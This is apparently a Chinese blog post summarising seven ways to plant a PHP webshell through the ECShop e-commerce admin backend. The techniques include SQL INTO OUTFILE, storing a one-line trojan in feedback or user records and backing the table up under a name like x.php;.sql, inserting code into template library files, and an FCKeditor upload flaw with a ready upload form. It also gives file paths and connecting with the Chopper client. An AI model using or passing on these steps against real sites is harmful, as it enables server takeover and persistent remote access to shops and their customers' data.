ecshop后台拿shell总结
- 发表于
- 周边
ecshop后台拿shell总结
ecshop拿shell
一、
系统==>数据库管理==>sql查询(可爆出物理路径):
==============创建表失败,导不出shell======================
show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values(‘‘);
select cmd from a into outfile ‘导出路径’;
drop table if exists a;
==================创建表失败,导不出shell===================
二、
前台留个言,内容是我们的一句话木马:
接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)
备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)
然后菜刀链接成功
http://www.baiduahck.com/data/sqldata/x.php;.sql
三、
1、添加会员,会员名称插入插入一句话 : ,其他随便填写。
2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users”
(其中XXX因各站而异,是数据前缀)
3、备份文件名为mm.php;.sql
4、一句话客户端连接mm.php;.sql,地址一般为 http://baiduhack.com/data/sqldata/mm.php;.sql
四、(
模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容最后面加入一句话代码:
菜刀链接http://www.baiduhack.com/myship.php 成功。
说明:有些服务器过滤了eval 导致失败。
五、
/includes/fckeditor/editor/filemanager/connectors/php/upload.php
/includes/fckeditor/editor/filemanager/connectors/php/connector.php
/includes/fckeditor/editor/filemanager/connectors/test.html
http://url/includes/fckeditor/editor/filemanager/connectors/test.html
代码省略
对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell
访问路径为
如果不登录后台访问的话是不能利用的,XXOO的。
EXP:
|
1 2 3 4 5 |
<form id="frmUpload" enctype="multipart/form-data" action="/includes/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post"> Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> |
直接上传PHP马
文件地址是:
/images/upload/Media/xx.php
六、
上传txt 并且没有过滤任何函数.
于是运用到了php的文件操作…
将以上代码插入库项目管理中的myship.ini
打开http://url/myship.php
即在http://url/data/目录下生成distant.php;a.txt
菜刀连接之…搞定..
七、
进入后台-系统设置-Flash播放器管理- 直接上传x.php
ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
